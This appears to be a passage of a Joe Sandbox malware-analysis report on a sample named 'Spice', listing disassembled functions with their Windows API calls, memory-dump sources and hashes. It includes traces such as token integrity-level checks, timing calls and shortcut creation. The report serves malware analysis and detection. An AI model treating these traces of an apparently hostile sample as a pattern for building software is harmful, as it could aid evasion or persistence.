                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 842720411-0
                                                                                                                                                                                                                                      • Opcode ID: d88561f2e3b1f705de78b51f3e7972cb6386614cac6f476574f4cedb410d6810
                                                                                                                                                                                                                                      • Instruction ID: c49c49d1187fb316cddcb2c43b9a0a52a02f6f93754d1b9c4e5c2053449c9523
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d88561f2e3b1f705de78b51f3e7972cb6386614cac6f476574f4cedb410d6810
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD011D71601308BFDB214FA9DE48E6B7BADFF89755B100569F849D2220DE329C51DA60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED581B
                                                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED5829
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5831
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00ED583B
                                                                                                                                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5877
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2833360925-0
                                                                                                                                                                                                                                      • Opcode ID: 6f57ced3481c912e58ef812703c314b47cc1652a42835fd24d869a78b5bb87e6
                                                                                                                                                                                                                                      • Instruction ID: bf548df03b046033baf8c75f20768b06347cbe3bab853d4b6803409aa8ac4f9e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f57ced3481c912e58ef812703c314b47cc1652a42835fd24d869a78b5bb87e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7016936C01A1DDBCF089FE4D849AEDBBB8FB08711F00556AE402B2241CF309554EBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC7C62,80070057,?,?,?,00EC8073), ref: 00EC7D45
                                                                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC7C62,80070057,?,?), ref: 00EC7D60
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC7C62,80070057,?,?), ref: 00EC7D6E
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC7C62,80070057,?), ref: 00EC7D7E
                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC7C62,80070057,?,?), ref: 00EC7D8A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                                                                                                      • Opcode ID: 7ddb5000784ff1aeab445ecd0fd3a8c1c7ad94e13e0a41efdf0fba23e117cc92
                                                                                                                                                                                                                                      • Instruction ID: 34c919882f707b58252098d809aae0bd992fad93e825999fa054e855a55e40ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ddb5000784ff1aeab445ecd0fd3a8c1c7ad94e13e0a41efdf0fba23e117cc92
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E019A72601218ABCB114F14DE04FAA7FEDFF85362F149028F84AE2210DB32ED019BA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8CDE
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8CE8
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8CF7
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8CFE
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC8D14
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                      • Opcode ID: 9515e96463dec13e0e055f00787d005f07731f6411b09fdc261cf02beddffe88
                                                                                                                                                                                                                                      • Instruction ID: 043748bded59e953283e6d515b0a5c01348909f30ae4c9c2bfc27c7b3d2912b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9515e96463dec13e0e055f00787d005f07731f6411b09fdc261cf02beddffe88
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EF04F35200208AFEB210FA59E89F673FADFF49758F104529F949D6190CE619C41EB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EC8D3F
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D49
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D58
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D5F
                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D75
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                      • Opcode ID: b87414106db5e023da1237789be373ad401b5a10e76fb1c4db9836dbbc9fa77b
                                                                                                                                                                                                                                      • Instruction ID: 37ef5a7dddc6f8d3c76c6730fbe87268cc9e57f02cb241d9e35fc812ee7dc658
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b87414106db5e023da1237789be373ad401b5a10e76fb1c4db9836dbbc9fa77b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36F03C31240308AFEB210FA5EE88F673BADFF89758F144119F94A96190CE619D41EB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ECCD90
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ECCDA7
                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00ECCDBF
                                                                                                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00ECCDDB
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00ECCDF5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                                                                                      • Opcode ID: 53f0de6eb3a2f0e0e5ffe6c2f69a51bb16fd91c93804e7abcba63729642a85ba
                                                                                                                                                                                                                                      • Instruction ID: a119b0bf56611ea089f991ef3bbd81fcc2ba18fc6d2ed43993ccc497d2909b78
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53f0de6eb3a2f0e0e5ffe6c2f69a51bb16fd91c93804e7abcba63729642a85ba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B401A230500708ABEB215B20DD4EFA67FB8FB00705F04066DF587B10E1DFE2A9559B80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 00E7179B
                                                                                                                                                                                                                                      • StrokeAndFillPath.GDI32(?,?,00EABBC9,00000000,?), ref: 00E717B7
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00E717CA
                                                                                                                                                                                                                                      • DeleteObject.GDI32 ref: 00E717DD
                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 00E717F8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2625713937-0
                                                                                                                                                                                                                                      • Opcode ID: e906b4a0a18599a2ff2d3685c29809f11f75d0ef164b0f177904533a0173355f
                                                                                                                                                                                                                                      • Instruction ID: 1478cf25d5c325aca40f0e0c5609e8316e5662a813b363c0f3a0e89c60a98b55
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e906b4a0a18599a2ff2d3685c29809f11f75d0ef164b0f177904533a0173355f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F0C97000834CABDB256F29EC4CB5A3BA6BB01336F64C255E56D551F0CB318996FF50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00EDCA75
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00F03D3C,00000000,00000001,00F03BAC,?), ref: 00EDCA8D
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00EDCCFA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                      • API String ID: 2683427295-24824748
                                                                                                                                                                                                                                      • Opcode ID: c67e87b5a088381957260b85428ca7d57cdedd91778427c3f0645f164749b0cf
                                                                                                                                                                                                                                      • Instruction ID: ae4bf557c0887c3652400a06b11130043216a546dee7711b60eeaebe9cfef399
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c67e87b5a088381957260b85428ca7d57cdedd91778427c3f0645f164749b0cf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49A13EB1104205AFD304EF64DC81EABB7ECEF94754F00895DF599A7292EB70EA09CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E90FE6: std::exception::exception.LIBCMT ref: 00E9101C
                                                                                                                                                                                                                                        • Part of subcall function 00E90FE6: __CxxThrowException@8.LIBCMT ref: 00E91031
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                        • Part of subcall function 00E81680: _memmove.LIBCMT ref: 00E816DB
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00E7E598
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E7E431
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                                                      • API String ID: 1943609520-557222456
                                                                                                                                                                                                                                      • Opcode ID: 861150ead4648cf3bed6ae115d0f7601534b144aedb88ff6850ab7baaa7c01b0
                                                                                                                                                                                                                                      • Instruction ID: 506cf73087a9b032d8e2aaabf10c7444449074536c7dbfbd8d1e48682811d0ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 861150ead4648cf3bed6ae115d0f7601534b144aedb88ff6850ab7baaa7c01b0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F918E721042019FC714FF24C895DAFB7E8EF99704F40695DF49AB72A1EA20ED45CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00E952CD
                                                                                                                                                                                                                                        • Part of subcall function 00EA0320: __87except.LIBCMT ref: 00EA035B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                                                                                                                                      • Opcode ID: c37fc286d193f2f7cfbc3c160c4850d0bf31e05288d51099c77c7fa86949753b
                                                                                                                                                                                                                                      • Instruction ID: d9b7a0d001412e6293b6f7dd8decea35f9ac2a1a07c06c49f956004583b14cef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c37fc286d193f2f7cfbc3c160c4850d0bf31e05288d51099c77c7fa86949753b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C519162D0960587CF12B714C95137A3BE4BB0A754F30BD58E4D1AA1F9EF349CC8AB46
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: #$+
                                                                                                                                                                                                                                      • API String ID: 0-2552117581
                                                                                                                                                                                                                                      • Opcode ID: b3efc31cc174571db31c3c9356a00b64d9c6ea52a6c05027724ea079f1b30421
                                                                                                                                                                                                                                      • Instruction ID: 275e14a9afdb1f5aceb305ffd73c9ace6d65405df4198a1bef523ea2d241a8bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3efc31cc174571db31c3c9356a00b64d9c6ea52a6c05027724ea079f1b30421
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D511376500246DFDF19EF68C840AFA7BA4EF55324F54205AEC95BB290D732AC43CB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove$_free
                                                                                                                                                                                                                                      • String ID: #V
                                                                                                                                                                                                                                      • API String ID: 2620147621-3658881132
                                                                                                                                                                                                                                      • Opcode ID: 8b063547b328f6c0e438298d494ebccaff23fb6634263e911e5908b0b0db136d
                                                                                                                                                                                                                                      • Instruction ID: 4dd56d1163238028597c41b02f499042e51c8d68c8c2f00ad1e3e880ff5768a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b063547b328f6c0e438298d494ebccaff23fb6634263e911e5908b0b0db136d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5515A716087419FDB24CF28C481B6BBBE1FF89314F44996DE999A7361EB31D801CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset$_memmove
                                                                                                                                                                                                                                      • String ID: ERCP
                                                                                                                                                                                                                                      • API String ID: 2532777613-1384759551
                                                                                                                                                                                                                                      • Opcode ID: f5c8506d884530c0b08a8add021f0eeb94393afe1e17c47af7246458cdd36385
                                                                                                                                                                                                                                      • Instruction ID: eb1e8d0e913227d1d7372d7c1df4b33d02321abdfc156ee87451da6ad88954c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5c8506d884530c0b08a8add021f0eeb94393afe1e17c47af7246458cdd36385
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA51D2B19043099BDB24DF64C881BEABBF5EF04314F24956EE54EEB281E731D586CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
